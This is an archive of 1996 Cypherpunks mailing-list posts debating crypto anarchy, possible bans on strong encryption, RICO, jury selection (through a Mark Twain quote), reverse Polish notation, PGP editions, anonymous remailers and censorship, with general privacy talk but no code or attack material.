>> standards of RICO.)
>
>Incorrect.  Employees of the Federal Government can be, and have been,
>prosecuted under RICO.  Many political corruption cases involve some RICO
>aspects.  This should make Mr. Bell a big fan of the statute, unless he
>just likes the flash of murdering officials instead.

No, I meant the ENTIRE government  Not just individual government officials. 
 Remember, RICO is _supposed_ to apply to any organization with a pattern of 
criminal activity, and has been used (in fact, probably mostly used) against 
organizations where many of the members are "merely" employees, quite 
analogous to the Federal government.  If RICO applies to anything, it should 
apply to the Feds, and that means conviction of the entire organization if 
it or its employees have a pattern of illegal activity.   Since RICO only 
requires a relatively tiny number of criminal acts to meet its standards, it 
should not be difficult to show enough criminality.



Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Fri, 8 Nov 1996 11:52:36 -0800 (PST)
To: cypherpunks@toad.com
Subject: "Nightmare on Crypto Street, Part 1"
In-Reply-To: <v03007802aea86e3be000@[207.167.93.63]>
Message-ID: <v03007801aea92a0b3cd2@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:29 AM -0500 11/8/96, Jeremiah A Blatz wrote:

>Peter's point: If everyone in the US wants a ban on strong crypto,
>excepth the people on this list and the million-odd terrorists who are
>using strong crypto to murder, rape, pillage, etc., then strong crypto
>will be banned.

Yes, I think this captures the essence of Peter's straw man argument. While
it's triggered a welcome change of discussion, from Vulis and such to a
more interesting discussion of crypto anarchy and possible restrictions on
crypto, and many of us have commented, I think the premises are weak.

I also summarize Peter's set up much as you did:

"Suppose the Four Horsemen ride in. Suppose planes are being shot down,
buildings in every city are being blown up, people are being killed left
and right by crypto-hired-killers, Sarin gas is wafting through the
subways, and cats are afraid to go out at night. People will get out their
pitchforks and break in the doors of their neighbors in search of the
demonic crypto tools of Satan. (There's even a cracking tool _named_ Satan,
so this proves the programmers need to be purified by holy fire!) The Bill
of Rights will be suspennded, cops will raid homes, the military will be on
the street corners, the Internet will be shut down, the government will be
replaced by a Military-Religious Complex, and thought criminals will be
rounded up and shot. The people will say, "Thank you" and will live happily
ever after."

And whenever any of us raised issues of Constitutionality of the measures
Peter was predicting, such as random searches, conviction based on
possession of an illegal tool, forced escrow, etc., it seemed that Peter's
response was usually some variant of:

"Won't matter. The people will demand action."

Well, given a frightening enough scenario, a pogrom or purge or witch hunt
is certainly possible, and in some countries such things have happened. The
Cultural Revolution, the Islamic Revolution(s), and the extermination of a
million Hutus (or Tutsis) by rival Tutsis (or Hutus) being only the most
recent examples.

But I think this "nightmare scenario" is implausible. Even a milder form,
such as a serious Sarin gas attack which kills, say, 1,000, and in which it
is discovered that the plotters used PGP to arrange things, is unlikely to
provoke a suspension of the Constitution and random searches. To be sure,
there would likely be _some_ violations of rights, some random searches,
some overreaching by authorities, etc. But as folks were rounded up, a la
Richard Jewell, and then found to have no connection to the Sarin
terrorists, despite having PGP on their machines!, then the hysteria will
fade.

And the civil rights lawyers will be out in full force, pointing out that
random searches are explicity and clearly prohibited by the Fourth
Amendment, and that the First Amendment is equally explicit and clear that
forms of speech may not be dictated. When the first 1000 random searches of
Internet users turn up only some neutral messages, albeit encrypted with
PGP in transmission, and maybe a few R-rated JPEGs of Pamela Anderson, and
the courts and DAs are faced with what charges to file and how to process
these "perps," the enthusiasm for random searches will fade further.

And the points many of us have been making about digital commerce, the
central role of the Net in so many things, and the international
connections, mean that a pogrom launched against the Net just isn't going
to fly. Too many corporate interests are at stake.

(Even the Taliban in Kabul are finding that their purge of women from the
working ranks is disastrous, as there just aren't enough survivng men to
staff the hospitals, schools, and administrative functions....)

The "Nightmare on Crypto Street, Part 1" scenario might make for an
interesting crypto-apocalyptic screenplay, though. I vote for John Travolta
playing me and Professor Irwin Corey playing Dr. Vulis. Got to find some
good female roles, though. Not easy with this topic.

--Tim May




"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Fri, 8 Nov 1996 11:52:57 -0800 (PST)
To: "Timothy C. May" <cypherpunks@toad.com
Subject: Re: Excusing Judges for Knowing Too Much
Message-ID: <v02140b16aea92ba9feaf@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:54 AM 11/8/1996, Timothy C. May wrote:
>At 8:20 AM -0500 11/8/96, Jim Ray wrote:
>> been decided and appealed, because of this very possibility. I am already
>> concerned that an ambitious U.S. Attorney, using Alta Vista, could attempt
>> to argue that "cypherpunk terrorists have been secretly trying to subtly
>> influence Kozinski's thinking, and that therefore he should be removed from
>> the case in favor of some judge who has no clue whatsoever about the 'Net,
>> encryption, anonymous remailers, etc." [I am sure the argument wouldn't be
>> put quite that way <g> but that's what the U.S. Attorney would mean.] There
>> is now a judge with some idea of these issues who will IMNSHO probably be
>> fair to "our" side. It is a rare opportunity, and I don't want to "blow it."

> A valid fear, given the times we live in.

> If jurors can be dismissed for knowing "too much" about the O,J.
> case--knowing how to _read_ ensures this--then we are probably
> fast-approaching the point where judges are recused (or whatever the word
> is) from hearing cases where they've had any education whatsover on.

> (An exaggeration, of course.)

This issue has been discussed recently by a prominent author.

  "The men who murdered Virginia's [The city in Nevada. -- ph] original
twenty-six cemetary occupants were never punished.  Why?  Because
Alfred the Great, when he invented trial by jury, and knew that he
had admirably framed it to secure justice in his age of the world,
was not aware that in the nineteenth century the condition of things
would be so entirely changed that unless he rose from the grave and
altered the jury plan to meet the emergency, it would prove the most
ingenious and infallible agency for {\it defeating} justice that
human wisdom could contrive.  For how could he imagine that we
simpletons would go on using his jury plan after circumstances had
stripped it of its usefulness, any more than he could imagine that
we would go no using his candle clock after we had invented
chronometers?  In his day news could not travel fast, and hence he
could easily find a jury of honest, intelligent men who had not
heard of the case they were called to try - but in our day
of telegraph and newspapers his plan compels us to swear in juries
composed of fools and rascals, because the system rigidly excludes
honest men and men of brains.
  "I remember one of those sorrowful farces, in Virginia, which we
call a jury trial.  A noted desperado killed Mr. B, a good citizen,
in the most wanton an cold-blooded way.  Of course the papers were
full of it, and all men capable of reading read about it.  And of
course all men not deaf and dumb an idiotic talked about it.  A jury
list was made out, and Mrs. B. L., a prominent banker and a valued
citizen, was questioned precisely as he would have been questioned
in any court in America:
  "`Have you heard of this homicide?'
  "`Yes.'
  "`Have you held conversations on the subject?'
  "`Yes.'
  "`Have you formed or expressed opinions about it?'
  "`Yes.'
  "`Have you read newspaper accounts of it?'
  "`Yes.'
  "`We do not want you.'
  "A minister, intelligent, esteemed, and greatly respected; a merchant
of high character and known probity; a mining superintendent of
intelligence and unblemished reputation; a quartz-mill owner of excellent
standing, were all questioned in the same way, and all set aside.  Each
said the public talk and the newspaper reports had not so biased his
mind but that sworn testimony would overthrow his previously formed
opinions and enable him to render a verdict withou;t prejudice and in
accordance with the facts.  But of course such men could not be trusted
with the case.  Ignoramuses alone could mete out unsullied justice.
  "When the peremptory challenges were all exhausted, a jury of twelve
men was empaneled - a jury who swore they had neither heard, read,
talked about, nor expressed an opinion concerning a murder which the
very cattle in the corrals, the Indians in the sagebrush, and the stones
in the streets were cognizant of!  It was a jury composed of two
desperadoes, two low beerhouse politicians, three barkeepers, two
ranchers who could not read, and three dull, stupid, human donkeys!
It actually came out afterward that one of these latter thought that
incest and arson were the same thing.
  "The verdict rendered by this jury was, Not Guilty.  What else could
one expect?
  "The jury system puts a ban upon intelligence and honest, and a
premium upon ignorance, stupidity, and perjury.  It is a shame that
we must continue to use a worthless system because it was good a
{/it thousand} years ago.  In this age, when a gentleman of high
social standing, intelligence, and probity swears that the testimony
given under solmen oath will outweigh, with him, street talk and
newspaper reports based on mere hearsay, he is worth a hundred
jurymen who will swear to their own ignorance and stupidity, and
justice would be far safer in his hands than theirs.  Why could not
the jury law be so altered as to give men of brains and honesty an
equal chance with fools and miscreants?  Is it right to show the
present favoritism to one class of men and inflict a disability
on another, in a land whose boast is that all its citizens are
free and equal?  I am a candidate for the legislature.  I desire
to tamper with the jury law.  I wish to so alter it as to put a
premium on intelligence and character, and close the jury box against
idiots, blacklegs, and people who do not read newspapers.  But no
doubt I shall be defeated - every effort I make to save the country
`misses fire.'"

>From "Roughing It" by Mark Twain, Chapter XLVIII.

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Fri, 8 Nov 1996 11:51:10 -0800 (PST)
To: cypherpunks@toad.com
Subject: "Nightmare on Crypto Street--the Return of Sun Devil"
In-Reply-To: <v02140b04aea905f722f8@[192.0.2.1]>
Message-ID: <v03007802aea93092c562@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



As I said in my "Nightmare on Crypto Street" piece, it seems that Peter
counters every one of our counterarguments with some variant of "won't
matter--they'll have a dozen agents and 20 MIT graduates looking for
evidence." Or, "won't matter, the Bill of Rights will be suspended for the
duration of the Emergency." Well, it's hard to argue with such points.

On a few plausibility points, or on technical points (as with the meaning
of "noise," for example), there's still a basis for a debate.

At 9:02 AM -0800 11/8/96, Peter Hendrickson wrote:

>Where will you keep your secret key?  Remember, when they go through your
>house they bring 20 young graduates from MIT who are just dying to show
>how clever they are and save the world at the same time.

Unlikely they'll be able to find or marshall 20 MIT grads. Didn't happen
when they raided Steve Jackson Games as part of Operation Sun Devil and
hauled away all of his equipment. It probably _did_ happen with the raid on
the Unabomber's cabin, except probably the numbers of MIT grads were fewer
and their specialties were in other areas.

Where do you keep your secret key? On your disk. However, one's PGP
_passphrase_ is what is really important (though both are important).
Without the passphrase, the secret key is worthless. Now of course some
people write down their passphrases on Post-It notes, etc., and certainly
keystroke capture programs may be running (inadvertently, deliberately, or
even via previous blackbag job plants, as many of us have noted over the
years). However, a properly memorized passphrase, of sufficient length and
entropy to make exhaustive search impractical, and proper "crypto hygiene"
will go a long way toward making such raids ineffective.

And there are several reports of such raids turning up PGP-encrypted files
which the cops and investigators have been unable to crack. PRZ speaks of
being asked to help, and some others here on this list have mentioned
similar situations. The Church of Scientology has been seeking "PGP
experts" to help them read some files they believe may help them get
someone punished. Basically, without the passphrase, not much can be done.

(I expect the "crypto hygiene" issue to get better, not worse. It is likely
that "crypto dongles" and PDAs will soon drop in price enough such that one
can store one's private key on a dongle, smartcard, or PDA and enter the
passphrase with a keypad built in...this dramatically cuts the risk that a
keystroke capture program is being run, or that a TEMPEST van is trying to
capture the keystrokes (LCD and low-power CMOS circuitry don't generate a
helluva lot of Van Eck radiation :-} .)

And there are the familiar low-tech versions of protecting some keying
material, such as "rat lines" into neighboring apartments. A few years ago
we talked about how hacker-friendly buildings could easily be wired up with
fibers and LANs such that files and key material were scattered in multiple
sites, with various "dead man switches" to shut off access should a raid
occur. Search warrants would of course be problematic (and the Bill of
Rights frowns on blanket searches for, say, 40 apartments on the suspicion
that a needed file may be on the hard disk of a machine in one of the 40
apartments).

Finally, on this point, "perfect forward secrecy" is possible with several
crypto protocols (notably, Diffie-Hellman). There is no stored keying
material left behind. Adapting this approach for other uses is likely to be
more popular in the future. (I certainly agree that text versions of "How
to Make Sarin" are always going to be incriminating in a legal case, but
crypto is not the main issue.)

>> This is the essence of steganography and the nature of signal and noise are
>> fundemental principles of information theory.
>
>The concept of noise is not all that well defined, however.  There is no
>way to look at a signal and say "this is all noise."  Sometimes physical
>theories may lead you to believe that it is all noise.  That is fine
>for many applications, but when becomes less convinced of things if
>the consequences are severe.

Actually, you've got it turned around. What is really hard to do, and what
is needed by a prosecutor seeking to prove a case, is to prove "this is
*not* noise."

As we've talked about for several years, storing and sending lots of noise
is a Good Thing. "Yes, FBI Agent Mulder, that is a noise packet I sent."

The claim that people will be thrown in prison for storing
apparently-random noise on their disks, or even sending it in their
writings, is ludicrous. Not so long as the Bill of Rights stands. Given the
"Nightmare on Crypto Street" scenario of mass pogroms and suspension of the
Constitution, maybe not. But I find this scenario implausible and not
really worth worrying about overmuch.

--Tim May


"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Thomas C. Allard" <m1tca00@FRB.GOV>
Date: Fri, 8 Nov 1996 08:13:48 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: [NOISE] If the shoe fits, wear it [VULIS]
Message-ID: <199611081612.LAA04764@bksmp2.FRB.GOV>
MIME-Version: 1.0
Content-Type: text/plain



Rich Graves <rcgraves@ix.netcom.com> said:

> networks@vir.com wrote:
> >  The nature of the Internet means it is extremely difficult for John
> > to prevent Dr. Vulis from either posting using a pseudonym or having
> > messages forwarded to him.  IF it were possible to prevent Vulis
> > from either reading messages or posting do you think John would have
> > done that too?  Just curious.
>
> I think that gets into "how many angels can dance on the head of a 
> pin"  territory, because it just isn't, and I certainly don't speak 
> for him.  But...

What if John didn't prevent him "suvscribing", but instead directed his 
software to simply send messages from Vulis back to him as though they were 
sent to the list, but in fact did not forward his messages to the rest of 
the list.  Vulis would continue to (spit) and (fart) on the list, would 
assume everyone else saw it, but would not see any replies to his spew.  
His remailer (spits) would still get through, but think how much less noise 
there would be.

Alternatively, he could just moderate the list and not forward his rantings 
at all.  LOTS more work, but still feasible.

All I'm saying is that it *is* possible for John to censor Vulis from this 
list if he was so inclined.

rgds-- TA  (tallard@frb.gov)
I don't speak for the Federal Reserve Board, it doesn't speak for me.
pgp fingerprint: 10 49 F5 24 F1 D9 A7 D6  DE 14 25 C8 C0 E2 57 9D






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Laurie <ben@gonzo.ben.algroup.co.uk>
Date: Fri, 8 Nov 1996 04:24:34 -0800 (PST)
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Sliderules, Logs, and Prodigies
In-Reply-To: <v03007803aea873ff3acc@[207.167.93.63]>
Message-ID: <9611081117.aa20234@gonzo.ben.algroup.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:
> 
> At 10:33 AM -0800 11/7/96, Dale Thorn wrote:
> 
> >According to HP, the "Polish" part of the term comes from a Polish
> >mathematician whose
> >name (I can't spell it, and I don't have the .DOC) is pronounced phonetically:
> >WOOCASHEVITZ.  The "reverse" part apparently means the inventor specified the
> >operation before the parameters, instead of how HP implemented it.
> 
> 
> Lucaciewicz, as I recall. His notation was originally that one would add
> two numbers, a and b, as "+ a b." A modified form, adapted for stack
> machines, was to add two numbers with "a b +." Hence, _reverse_ Polish
> notation, but equally sound.
> 
> This involves entering a, then pushing it onto the stack with an ENTER,
> then entering b, then hitting the "+" key to pop the stack and place the
> sum in the main (X) register.
> 
> For people who claim that (6 + 7) * 5 is the "natural" way to do things, I
> point out to them that the way one does it one's head is to take 6 and 7
> and add them then to multiply by 5. Or I show them
> 
>    6
> +  7
> -----
>    13
> *   5
> -----
>    65
> 
> Then they see that RPN is actually the way we do things in our head. Or on
> paper.
> 
> Computers do things with parentheses, we don't.
> 
> By the way, Polish notation is how LISP evaluates expressions. E.g.
> 
> (+ 6 7)
> 
> or, for the full problem above,
> 
> (* 5 (+ 6 7))
> 
> And for those of you are not LISP or Scheme fans, the language FORTH also
> uses Polish notation. RPN, in fact.

I think claiming RPN for Forth is pushing it a little far. Admittedly it is
stack-based (well, two-stack-based), and everything an operator can operate on
is to the left, but the provision of arbitrary stack manipulation, "compile"
mode (triggered by the '[' operator, if my memory serves) and so on make it
rather a different beast.

Incidentally, PostScript is Forth in disguise.

Cheers,

Ben.

-- 
Ben Laurie                Phone: +44 (181) 994 6435  Email: ben@algroup.co.uk
Freelance Consultant and  Fax:   +44 (181) 994 6472
Technical Director        URL: http://www.algroup.co.uk/Apache-SSL
A.L. Digital Ltd,         Apache Group member (http://www.apache.org)
London, England.          Apache-SSL author




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@amaranth.com>
Date: Fri, 8 Nov 1996 09:30:29 -0800 (PST)
To: "Michael C Taylor (CSD)" <mctaylor@olympus.mta.ca>
Subject: Re: Is there a Win PGP?
In-Reply-To: <Pine.OSF.3.90.961107161755.5877A-100000@olympus.mta.ca>
Message-ID: <199611081843.MAA07431@mailhub.amaranth.com>
MIME-Version: 1.0
Content-Type: text/plain


In <Pine.OSF.3.90.961107161755.5877A-100000@olympus.mta.ca>, on 11/07/96 at 05:06 PM,
   "Michael C Taylor (CSD)" <mctaylor@olympus.mta.ca> said:

>PGP Inc. (http://www.pgp.com/) is now marketing Viacrypt PGP.
> There are two packages, Viacrypt PGP Personal Edition which is PGP, like we  all
>know and love. PE also is available as DOS, MS-Windows, Mac, and UNIX. So  Viacrypt
>PGP/PE for DOS should feel similar if not identical to MIT's PGP,  though I haven't
>tested it yet.
> You could license IDEA single-license and license RSAREF for commerical  usage
>(http://www.consensus.com/ or JonathanZ@consensus.com), but why  bother?

Well their are several reasons I myself would rather use the "free" version in a commercial enviromet:

1. Source code is not available for the ViaCrypt version.

2. No OS/2 version

3. I really don't like the Windows GUI that ViaCrypt has developed. (I am biased by the fact that I have written my own <G>).

On # 1 this is a problem for those that like to have the source code and compile the program themselfs and without the source code one is unable to run it on an unsupported platform (see #2)

On #2 this is a bussiness dicision made by ViaCrypt. I'll leave it at that. (no sense starting an OS war).

On #3 this again is just a personal preference issue and would not rate it as a big factor.

I am corresponding with PGP Inc. on the legal issues of using the "free-ware" version in a commercial enviroment.


--
-----------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    WebExplorer & Java Enhanced!!!
Cooking With Warp 4.0

Author of PGPMR2 - PGP Front End for MR/2 Ice

Look for MR/2 Tips & Rexx Scripts
Get Work Place Shell for Windows!!
PGP & MR/2 the only way for secure e-mail.
                            
Finger whgiii@amaranth.com for PGP Key and other info
-----------------------------------------------------------
 
*MR/2 ICE: "Luke!  I'm your father!"  Bill Gates, 1980





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeremiah A Blatz <jer+@andrew.cmu.edu>
Date: Fri, 8 Nov 1996 08:31:39 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Why is cryptoanarchy irreversible?
In-Reply-To: <v03007802aea86e3be000@[207.167.93.63]>
Message-ID: <0mUpzf200YUf065kw0@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Peter's point: If everyone in the US wants a ban on strong crypto,
excepth the people on this list and the million-odd terrorists who are
using strong crypto to murder, rape, pillage, etc., then strong crypto
will be banned.

If I understarn your point, Peter, you are correct. However, there
probably won't be thousands of terrorist folks who can't be caught
because of their expert use of strong crypto. I mena, half the mad
bombers in the US try to get their deposit back on the vans that they
used to blow up buildings. Do you think these people will be able to
effectively use crypto?

Furthermore, terrorrim and etc do not depend upon secure
communications to work. People tend to be able to talk face-to-face in
isolated environs, this is just as effective as a good public-key
cryptosystem. Crypto won't suddenly protect the types of people who
are professional killers/terrorists from scrutiny. It meerly would
allow them to communicate securely over distances of more than 10
feet. This, IMO, is not much of a win for them.

So, you're right. Given the proper conditions, strong crypto could
probably be mostly stopped. However, these conditions are quite
unlikely to arise.

Jer

"standing on top of the world/ never knew how you never could/ never knew
 why you never could live/ innocent life that everyone did" -Wormhole

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMoNf5ckz/YzIV3P5AQHzNwL/XDr62TKhBrthrrWkS1KRv/H0yryv0EkO
PErVFSHWC9YsNdON97YXD75fHrVdhpfPUfHStmJY9l7IM91RQkoozolV36Q3OwVy
YOa3tEtn4TuCq3wxD2xIwaAlVWkBe0jw
=gXVT
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 8 Nov 1996 11:37:21 -0800 (PST)
To: Matts Kallioniemi <cypherpunks@toad.com
Subject: Re: Why is cryptoanarchy irreversible?
Message-ID: <199611081935.LAA25361@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:46 PM 11/8/96 +0100, Matts Kallioniemi wrote:
>At 17:12 1996-11-07 -0800, jim bell wrote:
>>Simple analogy:  Suppose you put two people into a room with a deck of 
>>playing cards and a table, instructing "Person A" to build a house-of-cards, 
>>and telling "Person B" to stop him from achieving his goal.  Who do you 
>>think will win?  Obviously, the latter will win:  It's vastly easier to 
>>knock such a structure down than to build it in the first place,  and all 
>>"Person B" has to do is occasionally take a whack at the structure. 
>
>What if Person A is better armed? Could that change the outcome?

Well, okay, I sorta assumed a non-violent scenario.  But adding that as a 
possibility actually strengthens the argument:  Generally, it's easier to 
stop somebody doing something out in the open, than to do it.  It's easier 
to knock down a house of cards than to build it up.  But it's also easier to 
shoot the person doing the knocking down, etc.

On the other hand, it's easier to DO something...if it can be done in 
secret.  And it's harder to keep somebody from doing something, if that 
something can be kept secret.  That's why it's so important that good 
cryptography remain legal.



 

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 8 Nov 1996 11:35:34 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Clinton
Message-ID: <199611081935.LAA25374@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


Someone asked,

>>How the result of the election will affect crypto etc.?

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Fri, 8 Nov 1996 11:39:04 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Why is cryptoanarchy irreversible?
In-Reply-To: <v02140b11aea9198ebda1@[192.0.2.1]>
Message-ID: <v03007803aea93bec7016@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:50 AM -0800 11/8/96, Peter Hendrickson wrote:
>At 11:29 AM 11/8/1996, Jeremiah A Blatz wrote:

>> Furthermore, terrorrim and etc do not depend upon secure
>> communications to work. People tend to be able to talk face-to-face in
>> isolated environs, this is just as effective as a good public-key
>> cryptosystem. Crypto won't suddenly protect the types of people who
>> are professional killers/terrorists from scrutiny. It meerly would
>> allow them to communicate securely over distances of more than 10
>> feet. This, IMO, is not much of a win for them.
>
>Face-to-face communications in isolated environs does not a cryptoanarchy
>make.

Yes, but you're the one talking about bombings, mass killings, Sarin gas
attacks, and other such examples of "terrorism." You cite the presence of
these things as why the Constitution will effectively be suspended and why
neighbors will cheerfully conduct vigilante raids on their suspected
terrorists.

Crypto anarchy is not the same thing as terrorism. Calling terrorism
"crypto anarchy" does not make it so.

--Tim May


"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbugden@smtplink.alis.ca
Date: Fri, 8 Nov 1996 09:09:27 -0800 (PST)
To: cypherpunks@toad.com
Subject: His and Her Anarchies
Message-ID: <9610088474.AA847483743@smtplink.alis.ca>
MIME-Version: 1.0
Content-Type: text/plain


Copyright c 1996, The Globe and Mail Company r

U.S. election reveals his and her politics 
Educated women have different agenda 

By Graham Fraser 
Washington Bureau

WASHINGTON - Bill Clinton's re-election has shone a spotlight on a 
widening difference in views between men and women in the United States, 
particularly among those with a university education. 

"Men and women, if college educated, agree about very little," Celinda 
Lake, a Democratic pollster, told a conference organized by the 
Brookings Institution yesterday. "Men and women would have elected a 
different president, a different Senate, and a different House of 
Representatives," Ms. Lake said. 

She pointed out that "men and women are coming to some pretty different 
conclusions" about the role of government and the importance of social 
programs. 

Polling has shown that women believe the government can play a positive 
role in solving social problems, while men feel that government is a 
problem, and that it is a good day when they have not been hurt by it, 
Ms. Lake said. 

"On our side of the aisle, we're beginning to wonder what a college 
education does for a man," she said. 

 ...

http://web.theglobeandmail.com/web/cgi-bin/
DisplayPage?SITE=web&KEY=961108.GlobeFront.UGUYSM





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Roach <roach_s@alph.swosu.edu>
Date: Fri, 8 Nov 1996 12:29:51 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Blocking addresses by default
Message-ID: <199611082029.MAA07731@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:25 PM 11/7/96 -0500, you wrote:
>Mark M. wrote:
>> 
>> 
>> With remailer abuse becoming more popular and remailers going down
>> because of complaints, there seems to be some interest in remailer
>> software that will block all email by default and will only pass
>> along email that is explicitly unblocked.
>I think this threatens serious security problems for the remailer 
>network in two ways:
>
>1. You'd create a list of people interested in anonymous information,
>   which could potentially be obtained by police or other armed thugs.
>
However, those armed thugs would come up with a bunch of public keys with no
names attached.  These keys could be used to check that "person X's" e-mail
was h[er,is] own but never know who was attached to that signature.  Also,
complaints could use that signature to close down the account, so that
"person X" could no longer send.  Of course, this would not prevent that
individual from resubscribing, (what would, if you figure that out, apply it
to Dr. Vulis), it would allow for the remailer to be used without the fear
of the government confiscating the names of the individuals.  The only thing
I can think of that I don't have a solution for, note this is just what I've
thought of, is the sting, where the government would take over the remailer
and let it continue to operate, but logging the return posts.
This could work simply for mailing lists, such as this one, where the sender
could verify that the message got there in person, and receive h[er,is]
responses straight from the same list.  For private mail, the person would
have to submit to being a part of a group of approximately 100 others, with
all of the posts put in a newsgroup which would be downloaded in mass.
Anyone watching for downloads would only see that the person was one of
one-hundred who might have made that post.  All of the posts could be
encrypted with the key in plaintext for easy filtering.  No need to attempt
to decipher everyone's mail just to see what was for you.  This would be
akin to stopping by a bullitan board in a hospital to find out what the test
results were.  Anyone could see that you were there, but they wouldn't even
know what type of test you were in for, be it a blood-sugar test, a chemical
analysis, an X-ray or veneral-desease test.  All they would be able to tell
was that you're patient number was on that wall somewhere.
Persons wanting more security could download the entire contents of several
newsgroups straight to the screen while they were going to the fridge for a
soda.  Akin to visiting several bulletin boards to cover which post you were at.
Granted, the second idea is less secure than the mailing list one, but could
be made to work.  In the hospital, you could send a friend in for the check,
on the net, you could have a daemon remail the newsgroups for you and then
self destruct.  You could always keep a copy of the daemon on your hard
drive, and use multiple telnet sites to do the job.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <bryce@digicash.com>
Date: Fri, 8 Nov 1996 03:34:15 -0800 (PST)
To: cypherpunks@toad.com
Subject: Need a new word for non-violent-censorship
Message-ID: <199611081134.MAA16008@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

I often have the same difficulty when speaking with
Objectivists.  They define "censorship" as "silencing the
speaker by force", which is a fine and useful definition, but
suppose we want to talk about a similar phenomenon which does
not involve force?  For example, the magnate who owns all the
newspapers, television stations, bookstores and movie theatres
in a small town decides that never again will homosexuality be
publically mentioned in any of these venues.  Force?  No.
"Censorship"?  Not by _that_ definition, but what _is_ it?


We need a new word, or else we have to continue using
"censorship" to mean both of those things.  I sometimes use
"violent-censorship" and "non-violent-censorship" in
conversation.


As long as we continue to try to overload "censorship" we will
waste much of our dialogue energy on semantic quibbling or pure
misunderstanding.


Regards,

Zooko




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMoMarEjbHy8sKZitAQGzZQL+OuobcXVKg8bU1FIgdIZl/0i2QZ/5McmC
W//HUMtT+5D4sejWstVqkk2taB+jD9ctyKtgFIjIXOJdddsAAbd/Tbjr0TjuCMC4
FmagUDtrDD3tQOwiIXnb2rDit+GrfGPB
=X6N3
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 8 Nov 1996 09:41:08 -0800 (PST)
To: cypherpunks@toad.com
Subject: Rush disses anonymity
Message-ID: <v03007800aea91c1473f2@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


I'm sitting here listening to Rush, and he's talking about Pierre
Salanger's recent "discovery" ;-) of the anonymously posted friendly-fire
TWA800 internet message of a few months back.

In the process of discounting the story, and praising FBI pal Kalstrom, he
bemoans the anonymity of the net, calling it a "nest of kooks", (mixed in
with all the other "right thinking people", of course...).

Given this, and, of course, our own fun and games with anonymous, er,
slander, on this list, I'm frequently tempted to agree with him. After all,
if someone says something wrong about you, how do find them and punish
them? How do you know what the truth is, unless you know who said it?
